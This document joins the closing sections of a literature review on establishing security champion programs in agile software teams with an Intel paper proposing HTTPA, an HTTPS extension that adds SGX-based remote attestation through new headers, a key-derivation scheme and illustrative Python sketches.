Similarly, some actions are more common than others, such as A12 - Identify person with interest, A10 - Let champions volunteer, and A17 - Educate employees, train to perform the champion role.

Table 2. Description of the Categories
ID | Activity | Explanation | Papers
C1 | Manage stakeholders | Involvement of management and stakeholders | S1, S2, S3, S8, S9, S11
C2 | Define roles | Define the security champions role and responsibilities | S2, S3, S11
C3 | Assess current situations | Assess current security status | S8, S9
C4 | Recruit candidates | The recruitment process of the security champion. Appointed vs. volunteer | S1, S3, S8, S10, S11
C5 | Training | Training and skill development for the security champion | S1, S2, S8, S9, S10, S11
C6 | Communication | Communication between the security champions in a company | S1, S2, S10
C7 | Meetings | Regular meetings where the security champions can get together and discuss | S1
C8 | Control resources | Resources to support the champion | S1, S2
C9 | Feedback | Collecting feedback to improve security champion program | S1, S3, S8, S9
C10 | Automation | Automation of security champion activities | S3
C11 | Allocate time | Allocation of time for security champion tasks | S1, S11
C12 | Maintain team motivation | Actions to keep the security champions motivated | S8, S10, S11
C13 | Request services from the security team | Services the security champion can request from the security team at the organisation | S3
C14 | Evaluate results | Measure success and milestones | S8, S9

4.3 RQ3: Which Challenges Have Been Reported Regarding the Establishment and Maintenance of Security Champion in Agile Software Teams?
In addition to proposing a way of establishing a security champions network, some papers also report challenges. Most of the studies suggest that the best way to recruit champions is to have them volunteer for the role. S1 points out, however, that it might be challenging to find enough volunteers, especially in a big company. Security champions need executive support from both the security and engineering groups. This support empowers developers to spend their time on the security program and its activities, and ensures that the work is seen as important and is recognized by the management teams. Recognition and prioritization are, however, still an issue in many organizations. Another difficulty is the training. There is little to no information on how a security champion is best trained and what kind of training is necessary. S1 states that traditional classroom training sessions are not always practical. Implementing a security champions program requires significant expertise, as well as continuous time, effort, and funding [3].

Table 3. Categorisation of Actions Found in Research Papers
ID | Activity | Source
A1 | Software security person as driving force | S1.1
A2 | Create briefing document for the managers | S2
A3 | Have stakeholders support the program within the company | S3
A4 | Attain top management commitment | S8, S9
A5 | Get requisite decision making authority | S11
A6 | Define roles, responsibility and main skills | S2, S3
A7 | Provide clear expectations about what the champion role involves | S11
A8 | Assess current state, define ideal future, analyse the gap, and determine the steps needed | S9
A9 | Define the specific business problem and develop strategic action plan | S8
A10 | Let champions volunteer | S1.1, S1.2, S3, S11
A11 | If not enough volunteers, appoint people for the role | S1.2, S11
A12 | Identify person with interest | S1.1, S1.2, S3
A13 | Select potential champions | S8, S10
A14 | Individual skill development | S1.1
A15 | Skill development performed on demand | S1.2
A16 | Training in groups of max 10 employees | S2
A17 | Educate employees, train to perform the champion role | S8, S9, S10, S11
A18 | Training with reward system | S8
A19 | Set up communication channels: Email, Slack | S1.1, S1.2, S10
A20 | Set up communication channels: Monthly newsletter, internal website, Yammer, Facebook | S2
A21 | Bi-weekly meeting with the security champions to discuss and share information | S1.1, S1.2
A22 | Page with links for learning materials and list of courses and conferences | S1.1
A23 | Cyber-security hub with support and materials | S2
A24 | Retrospective after 6 months | S1.1
A25 | Collect feedback from the employees | S3, S8
A26 | Provide feedback to the employees | S9
A27 | Automate activities like onboarding and training to make the program more scalable | S3
A28 | Pre-allocate time for working on security | S1.1, S11
A29 | Create small wins | S8
A30 | Recognition and rewards in form of career development (pay increase or promotion) | S10, S11
A31 | Request services like briefing on latest threats, phishing drills, or tour of the security department | S3
A32 | Identify metrics, measures and milestones | S8, S9
5 Discussion
As seen in Table 2, multiple actions for establishing and maintaining a security champion program were found and sorted into 14 program activities. In comparison to existing guidelines for building a security champion program, for instance the six-step process in the OWASP security champions playbook [5] or Howell’s seven-step framework [12], our proposal is more comprehensive and comes with a detailed action list.
Actions regarding management and stakeholders are reported in more than half of the primary studies (six of 11, see C1 in Table 2). It is essential to get support from managers and stakeholders to establish a security champions program successfully. This means that it is important not only to increase developers’ attention to security issues but also for organizations to develop routines and reward the security work that developers do. The security champion should have clear expectations about what the champion role involves. In addition, communication between champions should occur on both formal and informal channels.
Letting champions volunteer is found to be an effective approach in Agile teams because the champion must have an interest in security to fulfill the role successfully. As seen in the general results, a security champion should be enthusiastic and have a particular interest in security. If an employee who does not want to become a security champion is forced to take the role, she might show little enthusiasm. It is difficult for a champion to make the team enthusiastic about security if she is not enthusiastic herself.
Even though the initial objective was to explore champion roles in Agile teams, we did not find many insights specific to Agile contexts. Only two approaches explicitly mention agile software teams. Some papers do not mention whether the teams are agile or not. However, there are no significant discrepancies between the actions of the agile teams and the other approaches. Whether the security champion is affected by being in an agile team should be further investigated. This especially concerns how championing can fit into agile methods and how to deal with the challenges mentioned in the background.
6 Conclusions
Security champions programs bridge the gap between security and development teams. Security champions have attracted significant interest from the software industry recently. This work presents the state of the art on security champions in software development projects, including Agile teams. We found that the security champion role is described consistently in the literature. We identified 14 categories and 32 different actions for establishing and maintaining security champions in Agile teams. We also found that implementing a security champions program requires significant expertise, as well as continuous time, effort, and funding. Despite finding multiple actions for building and maintaining security champions, we cannot come up with clear recommendations to practitioners, due to the lack of detail and relevance in the reported experience. In future work, one can conduct case studies on the role of security champions and their connections to the team, managers and other stakeholders in an Agile context.
References
1. Lipner, S.: The trustworthy computing security development lifecycle. In: 20th Annual Computer Security Applications Conference, pp. 2–13 (2004). https://doi.org/10.1109/CSAC.2004.41
2. https://www.oxfordlearnersdictionaries.com/definition/american_english/innovation
3. Alshaikh, M.: Developing cybersecurity culture to influence employee behavior: a practice perspective. Comput. Secur. 98, 102003 (2020)
4. Alshaikh, M., Adamson, B.: From awareness to influence: toward a model for improving employees’ security behaviour. Personal Ubiquitous Comput. 25(2), 1–13 (2021)
5. Antukh, A.: OWASP Security Champions Guidebook – OWASP Foundation (2017)
6. Beatty, C.A., Gordon, J.R.M.: Preaching the gospel: the evangelists of new technology. California Manage. Rev. 33(3), 73–94 (1991)
7. Berg, V., Birkeland, J., Nguyen-Duc, A., Pappas, I.O., Jaccheri, L.: Software startup engineering: a systematic mapping study. J. Syst. Softw. 144, 255–274 (2018)
8. Cico, O., Jaccheri, L., Nguyen-Duc, A., Zhang, H.: Exploring the intersection between software industry and software engineering education - a systematic mapping of software engineering trends. J. Syst. Softw. 172, 110736 (2020)
9. Gabriel, T., Furnell, S.: Selecting security champions. Comput. Fraud Secur. 2011(8), 8–12 (2011)
10. Haney, J., Lutters, W., Jacobs, J.: Cybersecurity advocates: force multipliers in security behavior change. IEEE Secur. Privacy 19(4), 54–59 (2021)
11. Haney, J.M., Lutters, W.G.: The work of cybersecurity advocates. In: Proceedings of the 2017 CHI Conference Extended Abstracts on Human Factors in Computing Systems, pp. 1663–1670 (2017)
12. Howell, J.M.: The right stuff: identifying and developing effective champions of innovation. Acad. Manage. Perspect. 19(2), 108–119 (2005)
13. Jaatun, M.G., Cruzes, D.S.: Care and feeding of your security champion. In: 2021 International Conference on Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), pp. 1–7. IEEE (2021)
14. Jenssen, J.I., Jørgensen, G.: How do corporate champions promote innovations? Int. J. Innov. Manag. 8(01), 63–86 (2004)
15. Keele, S., et al.: Guidelines for performing systematic literature reviews in software engineering. Technical report, Ver. 2.3, EBSE Technical Report. EBSE (2007)
16. Kitchenham, B.: Procedures for performing systematic reviews. Keele, UK, Keele University, vol. 33, pp. 1–26 (2004)
17. Morgan, G.: Riding the waves of change. Imaginization Inc (2013)
18. Nguyen-Duc, A., Cruzes, D.S., Conradi, R.: The impact of global dispersion on coordination, team performance and software quality - a systematic literature review, vol. 57, pp. 277–294
19. Okere, I., Van Niekerk, J., Carroll, M.: Assessing information security culture: a critical analysis of current approaches. In: 2012 Information Security for South Africa, pp. 1–8. IEEE (2012)
20. Oueslati, H., Rahman, M.M., ben Othmane, L.: Literature review of the challenges of developing secure software using the agile approach. In: 2015 10th International Conference on Availability, Reliability and Security, pp. 540–547 (2015)
21. Oyetoyan, T.D., Jaatun, M.G., Cruzes, D.S.: A lightweight measurement of software security skills, usage and training needs in agile teams, vol. 8, no. 1, pp. 1–27. Publisher: IGI Global
22. Riisom, K.R., Hubel, M.S., Alradhi, H.M., Nielsen, N.B., Kuusinen, K., Jabangwe, R.: Software security in agile software development: a literature review of challenges and solutions. In: Proceedings of the 19th International Conference on Agile Software Development: Companion, pp. 1–5 (2018)
23. Ryan, I., Roedig, U., Stol, K.-J.: Understanding developer security archetypes. In: 2021 IEEE/ACM 2nd International Workshop on Engineering and Cybersecurity of Critical Systems (EnCyCriS), pp. 37–40. IEEE (2021)
24. Shea, C.M.: A conceptual model to guide research on the activities and effects of innovation champions. Implementation Res. Pract. 2, 2633489521990443 (2021)
25. Thomas, T.W., Tabassum, M., Chu, B., Lipford, H.: Security during application development: An application security expert perspective. In: Proceedings of the 2018 CHI Conference on Human Factors in Computing Systems, pp. 1–12 (2018)
26. Van de Ven, A.H.: Central problems in the management of innovation. Manage. Sci. 32(5), 590–607 (1986)
27. Van Niekerk, J., Von Solms, R.: A holistic framework for the fostering of an information security sub-culture in organizations. In: Issa, vol. 1 (2005)
HTTPA: HTTPS Attestable Protocol
Gordon King and Hans Wang
Intel Corporation, California, USA
{gordon.king,hans.wang}@intel.com
Abstract. The Hypertext Transfer Protocol Secure (HTTPS) protocol has become an integral part of modern Internet technology. Currently, it is the primary protocol for commercialized web applications. It can provide a fast, secure connection with a certain level of privacy and integrity, and it has become a basic assumption of most web services on the Internet. However, HTTPS alone cannot provide security assurances for request data while it is being processed, so the computing environment remains exposed to uncertain risks and vulnerabilities. A hardware-based trusted execution environment (TEE) such as Intel® Software Guard Extensions (Intel® SGX) or Intel® Trust Domain Extensions (Intel® TDX) provides in-memory encryption to help protect runtime computation and reduce the risk of illegally leaking or modifying private information. (Note that we use SGX as an example for illustration in the following text.) The central concept of SGX is to enable computation to happen inside an enclave, a protected environment that encrypts the code and data pertaining to a security-sensitive computation. In addition, SGX provides security assurances via remote attestation for the web client to verify, including TCB identity, vendor identity, and verifier identity. Here, we propose an HTTP protocol extension, called HTTPS Attestable (HTTPA), which adds a remote attestation process to the HTTPS protocol to address privacy and security concerns on the web and the establishment of trust over the Internet. With HTTPA, we can provide security assurances for verification to establish trustworthiness with web services and ensure the integrity of request handling for web users. We expect that remote attestation will become a new trend adopted to reduce the security risks of web services. We propose the HTTPA protocol to unify web attestation and access to Internet services in a standard and efficient way.
Keywords: HTTP · HTTPA · Protocol · Attestation · Quote · TCB · TEE · Secret · Key exchange · Confidential computing · Trust · Web service
1 Introduction
Privacy is deeply rooted in human rights as a principle and is protected by law. With recent hacks and breaches, more online consumers are aware of their private data being at risk. In fact, they have no effective control over it, leading to cybersecurity anxiety, which is a new norm for our time. Obviously, the demands for cybersecurity and data privacy are rising. There are many interrelated efforts to protect sensitive data at rest, in transit, and in computing. Many of them have been applied to cloud, web services, and online businesses. Hypertext Transfer Protocol Secure (HTTPS) [10,13] is widely used to secure request data in motion, but the user data may still be at risk, e.g., of a data breach, if the processing code is not fully isolated from everything else, including the operating system on the host machine. A hardware-based TEE such as an Intel® SGX enclave is specifically designed for this concern. A remote system or user can get evidence through attestation to verify the identity of a trusted computing base (TCB) and the state of the TEE. Note that the TCB includes the hardware, firmware, and software that enforce the security policy, while the TEE provides an application with secure isolation at run time on the TCB. Most of the existing TEE solutions for protecting web services are narrowly fitted to specific domain problems [15]. We propose a general solution to standardize attestation over HTTPS and establish multiple trusted connections to protect and manage requested data for selected HTTP [8] domains. Also, our solution leverages the current HTTPS protocol, so it does not introduce as much complexity as other approaches [6]. This paper first discusses threat modeling. Then, we propose our protocol construction for attestation over HTTPS, which is called HTTPS Attestable (HTTPA). We hope this protocol can be considered a new standard in response to current Web security concerns. Lastly, we describe two operation modes: one-way HTTPA and mutual HTTPA (mHTTPA).
G. King and H. Wang: These authors contributed equally to this work.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 811–823, 2023. https://doi.org/10.1007/978-3-031-28073-3_54
2 Threat Modeling
HTTPA is designed to provide assurances via remote attestation [2] and confidential computing between a client and a server under the use case of the World Wide Web (WWW) over the Internet, so that the end-point user can verify the assurances to build trust. For one-way (or unilateral) HTTPA, we assume the client is trusted and the server is not trusted, so the client wants to attest the server to establish trust. The client can verify the assurances provided by the server to decide whether to run its computing workloads on the untrusted server. However, HTTPA does not guarantee that the server is trustworthy. HTTPA involves two parts: communication and computation. Regarding communication security, HTTPA inherits all the assumptions of HTTPS for secure communication, including using TLS and verifying the host identity via a certificate. Regarding computation security, the HTTPA protocol requires the server to provide a further assurance, the remote attestation status, for the computing workloads that run inside the secure enclave, so the client can run the workloads in encrypted memory with an attested enclave and an attested TCB. As such, the attack surface of the computation is the secure enclave itself, and everything outside the secure enclave is not trusted. We assume that attackers on the server end have privileged access to the system with the ability to read, write, delete, replay and tamper with the workloads in unencrypted memory. On the other hand, we assume software running inside the enclave is trusted if its certificate passes the client user’s verification. Furthermore, the HTTPA protocol requires that the software vendor identity, the TCB, and the quote verification provider’s identity are verifiable, so the protocol allows the client user to trust only what it agrees to trust by maintaining its own allowed list and denied list. HTTPA also provides an assurance that the client’s workloads run inside the expected enclave with the expected verified software. As such, users can confirm that their workloads are running inside the expected remote secure enclave, and they have the right to reject the computation when the verification result does not meet their security requirements. Running inside the secure enclave can significantly reduce the risk of user code or data being read or modified by an attack from outside the enclave. Therefore, HTTPA can further reduce the attack surface of HTTPS from the whole host system to the secure enclave. Lastly, HTTPA gives users the freedom to decide whether they agree with the results of the assurances before proceeding to the computation, thus further reducing cybersecurity risks.
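The allowed-list and denied-list decision described above can be sketched as follows. This is only an illustration under stated assumptions: the `TrustPolicy` class, the identity kinds (`vendor`, `tcb`, `verifier`), the example values, and the rule that every identity must be explicitly allowed and none denied are hypothetical choices, not part of the HTTPA proposal.

```python
from dataclasses import dataclass, field


@dataclass
class TrustPolicy:
    """Hypothetical client-side policy built from an allowed list and a denied list."""
    allowed: set = field(default_factory=set)  # (kind, value) pairs the client trusts
    denied: set = field(default_factory=set)   # (kind, value) pairs the client rejects

    def accepts(self, identities: dict) -> bool:
        pairs = set(identities.items())
        # Assumed rule: any denied identity rejects the computation outright.
        if pairs & self.denied:
            return False
        # Assumed rule: every presented identity must be explicitly allowed.
        return pairs <= self.allowed


policy = TrustPolicy(
    allowed={("vendor", "example-vendor"),
             ("tcb", "enclave-measurement-v2"),
             ("verifier", "example-verifier")},
    denied={("tcb", "enclave-measurement-v1")},
)

good = {"vendor": "example-vendor",
        "tcb": "enclave-measurement-v2",
        "verifier": "example-verifier"}
bad = dict(good, tcb="enclave-measurement-v1")

print(policy.accepts(good))  # proceed with the computation
print(policy.accepts(bad))   # reject the computation
```

A stricter or looser rule (for example, accepting unknown verifiers) would be an equally valid policy; the point is only that the decision stays with the client.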
3 Problem Statement
Currently, many software services behind a website are still vulnerable due to unsafe in-memory computation. Extensive in-network processing worsens the situation further by enlarging the attack surface. There is no sufficient assurance for workload computation, so most web services remain lacking in trust. We argue that current HTTPS is not sufficient to build fundamental trust for users in the modern cloud computing infrastructure. The current situation of the Internet can put people’s private information and digital assets at great risk, to the point that users fully lose control over their own data. Following the end-to-end principle, we propose an attestation-based assurance protocol at the application layer of the OSI model (L7) to address this. Although we cannot guarantee fully secure computation, we can provide assurances that greatly reduce risks and let Internet users regain control of their data, where trust is built by verifying assurances.
4 HTTPS Attestable (HTTPA) Protocol
In this section, we first describe the standard HTTPS protocol on which we build our solution to establish an initial secure channel between the web server and the client. Then, we present the HTTPA protocol by adding a new HTTP method [9] of attestation to establish multiple trusted channels. The new method unifies attestation [4,5] and web access operations together for web applications in a general way.
4.1 Standard HTTP over TLS
The primary purpose of TLS [14] is to protect web application data from unauthorized disclosure and modification when it is transmitted between the client and the server. The HTTPS/TLS security model uses a “certificate” to ensure authenticity. The certificate is cryptographically “signed” by a trusted certificate authority (CA) [12]. It is the current standard practice for communication over the Internet.
Fig. 1. An overview of standard HTTPS (HTTP over TLS) handshake process
Figure 1 shows the HTTPS handshake mechanism. In HTTPS, the communication protocol is encrypted using TLS. It provides authentication of the server to the client as well as integrity guarantees, forward secrecy, and replay prevention, but it does not offer any of these security benefits to data that is in compute or at rest. Therefore, request handling code running in an untrusted environment, which may expose sensitive data to attackers, cannot be trusted. The client user cannot be confident that their private information will not be disclosed while the monitoring/notification processes are also running in an untrusted environment, as shown in Fig. 2a. Figure 2a shows the possible attacks when only HTTPS is used to protect the request data sent by remote web users or systems. They can validate a certificate that represents the specific domain. However, authorizing a runtime environment is extremely difficult if it is not well protected by a hardware-based TEE, because the environment is constantly changing. Therefore, the session keys, private key, and cleartext may be revealed if they are handled in an untrusted environment.
4.2 Attestation over HTTPS
The Intel® SGX technology [3] is designed to provide a hardware-based TEE to reduce the TCB and protect private data in computing. A smaller TCB implies fewer security risks because it reduces the exposure to various attacks and the surface of vulnerability. Also, it can use an attestation service to establish a trusted channel. With a hardware-based TEE, an attestation mechanism can help rigorously verify the TCB integrity, confidentiality, and identity. We propose to use remote attestation as the core interface for web users or web services to establish trust, in the form of a secure trusted channel for provisioning secrets or sensitive information. To achieve this goal, we add a new set of HTTP methods, including HTTP preflight [1] request/response, HTTP attest request/response, and HTTP trusted session request/response, to realize remote attestation. These methods allow web users and web services to establish a trusted connection directly with the code running inside the hardware-based TEE, as shown in Fig. 2b.
(a) The current security status on the Internet using HTTPS, which provides untrusted but secure service access. The attacker can perform a privilege escalation attack on the server to hack the session. Once the attacker obtains the session secret, the attacker can compromise the secure channel between the server and the client by using the key to decrypt packets.
(b) The possible future security status on the Internet using the proposed HTTPA, which provides trusted and secure service access. The attacker cannot easily hack the session keys inside the secure enclave even with privileged access to the server. Therefore, it is more difficult for the attacker to compromise the privacy and integrity of the client’s data on the server.
Fig. 2. The proposed HTTPA protocol provides HTTP attestation methods to establish a trusted channel on top of the secure channel of HTTPS. Therefore, compared with HTTPS, the HTTPA protocol significantly reduces the risk of exposing sensitive data
The TLS protocol supports the modification of the existing secure channel with a new server certificate and ciphering parameters, and there are some efforts exploring ways to weave the attestation process into the TLS layer [7,11]. However, our method does not replace the existing secure channel with the trusted channel. Furthermore, we allow the creation of multiple trusted channels inside a single TLS-secured channel, as shown in Fig. 3.
Fig. 3. The proposed HTTPA supports establishing multiple trusted channels on top of the same secure channel as a scalable solution to the current internet use case
Figure 4 shows an overview of the proposed HTTPA handshake process. The HTTPA handshake process consists of three stages: HTTP preflight request/response, HTTP attestation request/response, and HTTP trusted session request/response. The HTTP preflight request/response checks whether the platform is capable of attestation, as shown in Fig. 5. It has nothing to do with security and has no bearing on a web application. Rather, the preflight mechanism benefits servers that were developed without an awareness of HTTPA, and it functions as a sanity check between the client and the server that they are both HTTPA-aware. The attestation request that follows is not a simple request, so the preflight request acts as a kind of “protection by awareness”. The HTTP attestation request/response provides the quote and quote verification features. The HTTP trusted session request/response establishes a trusted session to protect HTTPA traffic, in which only the verified TCB code can see the request data. A trusted session, which creates a trusted channel, begins when the session key is generated and ends when it is destroyed. The trusted session can temporarily store information related to the activities of HTTPA while connected. We describe our HTTPA protocol in terms of one-way HTTPA and mutual HTTPA (mHTTPA) in the following sections.
4.3 One-Way HTTPA
The one-way HTTPA protocol is built on top of standard HTTPS. In this case, only the client validates the server to ensure that it receives data from the expected TCB and its hosting server. Our methodology is to perform the HTTP attestation handshake over the established secure channel of HTTPS. Our one-way HTTPA is described as follows. The client and server establish a secure channel if the preflight request for each domain is successful. The preflight request checks whether the server accepts the attestation protocol, that is, the use of the “ATTEST” method and headers. It is an “OPTIONS” request that uses one HTTP request header: Access-Control-Request-Method.
Fig. 4. An overview of the proposed HTTPA protocol. The HTTPA protocol consists of three sets of HTTP methods, including HTTP Preflight Request/Response, HTTP Attest Request/Response, and HTTP Trusted Session Request/Response
Fig. 5. Following Fig. 4, we specifically show how the HTTP Preflight Request/Response works in detail. First, the client sends out an HTTP Preflight Request to confirm whether the server has attestation capability. If the server does not have attestation capability, it responds with no content. Then the communication between the server and the client stops because the server does not have the capability to provide trusted assurances. If the server has attestation capability, it responds with OK to allow the attestation method to proceed.
Following the preflight request/response, a new set of HTTP methods is proposed to handle the attestation message exchange, as shown in Fig. 6. The set of HTTP methods includes the HTTP attest request, HTTP attest response, HTTP trusted session request, and HTTP trusted session response.
First, the HTTP attest request is generated by the client, using four new HTTP request headers as follows:
1. Attest-Date: This item contains the date and time at which the attestation quote material was generated on the client side. This is optional for the one-way HTTPA protocol.
2. Attest-Session-Id: A unique string that identifies a session. Here it is empty/null. If we had connected to a TEE a few seconds earlier, we could potentially resume a session and avoid repeating a full attestation handshake.
3. Attest-Random: This is a set of random bytes generated by the client for key derivation.
4. Attest-Cipher-Suites: This is a list of all of the encryption algorithms that the client is willing to support.
Second, the server provides the received random bytes to the TEE once the TEE has been created and is ready to accept requests. The HTTP attest response that follows includes these headers:
1. Attest-Date: The date and time at which the attestation quote material was generated on the server side.
2. Attest-Quote: This item contains a quote that was generated by the TCB hosting the web service that will handle HTTPA requests to the domain in question. The max-age indicates how long the results of the ATTEST request can be cached.
3. Attest-Pubkey: This item contains a public key that was generated inside the TEE for exchanging secret keys. Its paired private key should never leave its TEE. In addition, it needs to be bound to the identity of its TCB, so the fingerprint of the public key should be carried by its TCB quote as payload, see Fig. 7.
4. Attest-Random: This item contains random bytes generated by the server. This will be used later.
5. Attest-Session-Id: The session id is generated by a web service running inside the TEE of the server.
6. Attest-Cipher-Suite: This is an encryption algorithm picked by the server for trusted channel encryption.
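The preflight and attest exchange above can be sketched from the client side as follows. This is a minimal illustration, not the authors' implementation: the status code check (200 for OK), the 32-byte random length, base64 encoding of header values, the cipher suite name, and the use of SHA-256 as the public key fingerprint are all assumptions made for this sketch, and the helper names are hypothetical.

```python
import base64
import hashlib
import hmac
import os
from email.utils import formatdate


def preflight_headers() -> dict:
    # Header for the OPTIONS preflight that asks whether ATTEST is accepted.
    return {"Access-Control-Request-Method": "ATTEST"}


def may_attest(preflight_status: int) -> bool:
    # Assumption: "OK" maps to status 200; any other answer (e.g. no content) stops the flow.
    return preflight_status == 200


def build_attest_request_headers(cipher_suites, session_id: str = "") -> dict:
    client_random = os.urandom(32)  # assumed length; used later for key derivation
    return {
        "Attest-Date": formatdate(usegmt=True),  # optional in one-way HTTPA
        "Attest-Session-Id": session_id,         # empty on a fresh handshake
        "Attest-Random": base64.b64encode(client_random).decode("ascii"),
        "Attest-Cipher-Suites": ", ".join(cipher_suites),
    }


def pubkey_bound_to_quote(attest_pubkey_b64: str, quote_payload: bytes) -> bool:
    # Assumption: the quote payload carries the SHA-256 fingerprint of the TEE public key.
    fingerprint = hashlib.sha256(base64.b64decode(attest_pubkey_b64)).digest()
    return hmac.compare_digest(fingerprint, quote_payload)


if __name__ == "__main__":
    if may_attest(200):
        print(build_attest_request_headers(["AES_256_GCM_SHA384"]))
```

The binding check matters because a public key that is not tied to the quote could have been generated outside the attested TEE.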
Third, the client uses the received public key of the TEE to wrap a secret, which is the pre-session secret. The wrapped pre-session secret is later used for the key derivation. The web application should send the wrapped pre-session secret directly into the web service TEE because the secret can only be unwrapped by its paired private key inside the TEE of the web service. The HTTP trusted session request includes the following header:
1. Attest-Secret: Contains a pre-session secret wrapped by the server-side TEE public key.
Fig. 6. Following
In the last step, the HTTP trusted session response confirms that the pre-session secret has been received by the server. Thus far, both the server and the client (and only those two sides) have the pre-session secret. Each party can calculate the “trusted session keys”, which are derived from the pre-session secret and the random bytes of both parties. To create the trusted session keys, including the MAC keys, the encryption keys, and the IVs for cipher block initialization, we use a PRF, the “Pseudo-Random Function”, to create a “key block” from which we pull data:
key_block = PRF(pre_session_secret, "trusted session keys", ClientAttest.random + ServerAttest.random)
The pre-session secret is the secret we sent earlier, which is simply an array of bytes. We then concatenate the random bytes that were sent via the HTTP attest request/response from the client and server sides. We use the PRF to combine the secret with the concatenated random bytes. The bytes from the “key block” are used to populate the following:
client_write_MAC_secret[size]
server_write_MAC_secret[size]
client_write_key[key_material_length]
server_write_key[key_material_length]
client_write_IV[IV_size]
server_write_IV[IV_size]
The use of Initialization Vectors (IVs) depends on which cipher suite is selected at the very beginning, and we need two Message Authentication Code (MAC) keys, one for each side. In addition, both sides need the encryption keys, and they use the trusted session keys to make sure that the encrypted request data has not been tampered with and can only be seen by the request handlers running in the attested TCB.
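The key block derivation can be sketched as follows. The text does not specify which PRF is used; this sketch assumes the TLS 1.2 PRF (the P_SHA256 expansion of RFC 5246), and the key sizes (32-byte MAC keys, 32-byte encryption keys, 12-byte IVs) are placeholder assumptions that would in practice follow from the negotiated cipher suite.

```python
import hashlib
import hmac


def prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """TLS 1.2 style P_SHA256 expansion; an assumed choice of PRF for this sketch."""
    seed = label + seed
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()            # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return out[:length]


def derive_trusted_session_keys(pre_session_secret: bytes,
                                client_random: bytes,
                                server_random: bytes,
                                mac_len: int = 32,
                                key_len: int = 32,
                                iv_len: int = 12) -> dict:
    # Layout of the key block, in the order listed in the text.
    layout = [
        ("client_write_MAC_secret", mac_len),
        ("server_write_MAC_secret", mac_len),
        ("client_write_key", key_len),
        ("server_write_key", key_len),
        ("client_write_IV", iv_len),
        ("server_write_IV", iv_len),
    ]
    total = sum(size for _, size in layout)
    key_block = prf(pre_session_secret, b"trusted session keys",
                    client_random + server_random, total)
    keys, offset = {}, 0
    for name, size in layout:
        keys[name] = key_block[offset:offset + size]
        offset += size
    return keys


if __name__ == "__main__":
    keys = derive_trusted_session_keys(b"\x01" * 48, b"\x02" * 32, b"\x03" * 32)
    for name, value in keys.items():
        print(name, len(value))
```

Because both sides feed the same secret and the same concatenated random bytes into the PRF, they arrive at identical keys without sending the keys themselves over the channel.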
Fig. 7. A summary of the primary steps of HTTPA, including quote generation, third-party quote verification, obtaining the TEE’s public key, and using the pre-session secret to establish the trusted channel between the server and the client
The client needs to verify the server quote to establish the trustworthiness of the platform, including verifying the integrity of the code running inside the TCB of the web services. Usually, there are authorities that offer such services, so the client can request a trusted attestation service to verify the server quote. A verifier quote may be returned to the client along with the verification result; thus, the client side can collect several identities to make a decision. The router, shown in Fig. 7, could be placed in the untrusted part of a web application to route service requests according to the HTTP header, and the web application is expected to create multiple isolated TCBs to confidentially handle different kinds of requests. The identities are as follows:
1. Domain identity: It is the identity issued by a Certificate Authority (CA), and it is used in the TLS protocol.
2. TCB identity: It is the identity of the web service TCB, measured by hardware and embedded in a quote.
3. Vendor identity: It is a signing identity of the web service provided by a CA, which signs the TCB prior to distribution.
4. Verifier identity: The identity is received from an attestation service along with the attestation result.
All those identities need to be validated by verifying their certificate chains. The user can selectively add any combination of them to the allowed list or denied list.
4.4 Mutual HTTPA (mHTTPA)
In addition to the one-way HTTPA protocol, HTTPA includes the other direction, so both client and server attest to each other to ensure that both parties involved in the communication are trusted. Both parties share their quotes, on which the verification and validation are performed. Figure 8 shows the handshake process of the mHTTPA protocol. Compared to one-way HTTPA (see Fig. 6), the difference is that the client sends its quote and its TEE public key to the server in the first request so that the server can verify the quote, and the server then sends a service quote back as a response if the client quote was attested. There is also a slight change to the key block generation: both sides now need to include two pre-session secrets for deriving session keys in their own TEEs, respectively.
key_block = PRF(server_pre_session_secret, client_pre_session_secret, "trusted mutual session keys", ClientAttest.random + ServerAttest.random)
Fig. 8. Comparing with Fig. 6, the major difference of mHTTPA from one-way HTTPA is the step of HTTP Attest Request. After confirming the server’s capability to provide attestation described in Fig. 5, the client generates its own quote for the server to verify. Then the client sends HTTP Attest Request to the server, which includes the client’s generated quotes, TEE public key, random bytes, cipher suites, and meta information. Then the server verifies the quote of the client. If the client’s quote is not verified successfully, the communication stops. If the quote is verified successfully, the server generates its quote. Then the server sends HTTP Attest Response to respond to the client with the server’s quote, TEE public key, random bytes, chosen cipher algorithm, and the meta information. After this part, the remaining steps follow the same as described in Fig. 6 for each party.
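The server-side handling of the mHTTPA attest request described in Fig. 8 can be sketched as follows. This is a hypothetical illustration: the function name, the dictionary field names, the injected `verify_quote` and `generate_quote` callables, and the choice of the first offered cipher suite are all assumptions, and real quote verification would involve an attestation service rather than a local callback.

```python
from typing import Callable, Optional


def handle_mutual_attest_request(request: dict,
                                 verify_quote: Callable[[bytes], bool],
                                 generate_quote: Callable[[], bytes],
                                 server_pubkey: bytes,
                                 server_random: bytes) -> Optional[dict]:
    """Return the attest response fields, or None if the handshake must stop."""
    # Step 1: the server verifies the client's quote before doing anything else.
    if not verify_quote(request["quote"]):
        return None  # communication stops; no server quote is generated
    # Step 2: only after a successful check does the server generate its own quote.
    return {
        "quote": generate_quote(),
        "pubkey": server_pubkey,
        "random": server_random,
        # Assumption: pick the first suite the client offered.
        "cipher_suite": request["cipher_suites"][0],
    }


if __name__ == "__main__":
    demo_request = {
        "quote": b"client-quote",
        "pubkey": b"client-tee-pubkey",
        "random": b"client-random",
        "cipher_suites": ["SUITE_A", "SUITE_B"],
    }
    response = handle_mutual_attest_request(
        demo_request,
        verify_quote=lambda quote: quote == b"client-quote",
        generate_quote=lambda: b"server-quote",
        server_pubkey=b"server-tee-pubkey",
        server_random=b"server-random",
    )
    print(response)
```

Ordering the checks this way means a server never reveals its own quote to a client whose quote failed verification.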
5 Summary
This paper presents the HTTPA as a new protocol to unify the attestation process and HTTPS. With HTTPA, we can establish a trusted channel over HTTPS for web service access in a standard and effective way. We demonstrate the proposed HTTPA protocol where attestation is used to provide assurances for verification, and we show how a web service is properly instantiated on a trusted platform. The remote web user or system can then gain confidence that only such intended request handlers are running on the trusted hardware. Using HTTPA, we believe that we can reduce security risks by verifying those assurances to determine the acceptance or rejection.
References
1. Fetch
2. Intel® Software Guard Extensions ECDSA - attestation for data center orientation guide
